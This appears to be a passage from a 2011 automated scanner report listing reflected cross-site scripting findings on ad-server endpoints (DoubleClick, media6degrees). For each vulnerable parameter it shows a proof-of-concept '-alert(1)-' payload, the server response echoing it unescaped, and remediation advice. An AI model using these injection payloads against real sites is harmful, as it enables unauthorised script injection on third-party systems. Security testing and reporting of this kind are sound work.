document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... h%3Dv8/3b34/f/ad/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448%0036e76"-alert(1)-"c692859c262&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscr ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c83d2'-alert(1)-'90040ac53db was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d2cd'-alert(1)-'e6902756722 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6016 Date: Tue, 28 Jun 2011 02:55:12 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065308d2cd'-alert(1)-'e6902756722&redirect=http%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7251'-alert(1)-'2917f9be78f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6016 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 02:55:32 GMT Expires: Tue, 28 Jun 2011 02:55:32 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... 276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=a7251'-alert(1)-'2917f9be78fhttp%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca11'-alert(1)-'054d5ab12e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6016 Date: Tue, 28 Jun 2011 02:54:01 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... p://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234dca11'-alert(1)-'054d5ab12e9&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d32f1'-alert(1)-'db921ef1f73 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 3286 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 03:02:39 GMT Expires: Tue, 28 Jun 2011 03:02:39 GMT
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Wed Feb 03 10:54:52 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... ercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112'; var alttext = ''; var dcgif = 'http://s0.2mdn.net/1796512/CB728x90.jpg'; var dccreativewidth = '728'; var dcwmode = 'opaque'; var imgurl = 'd32f1'-alert(1)-'db921ef1f73http://discovercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/CB728x90.swf'; var dcminversion = '9'; var d ...[SNIP]...
1.133. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.media6degrees.com
Path:
/adserv/cs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62ac5"-alert(1)-"553f8be859b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.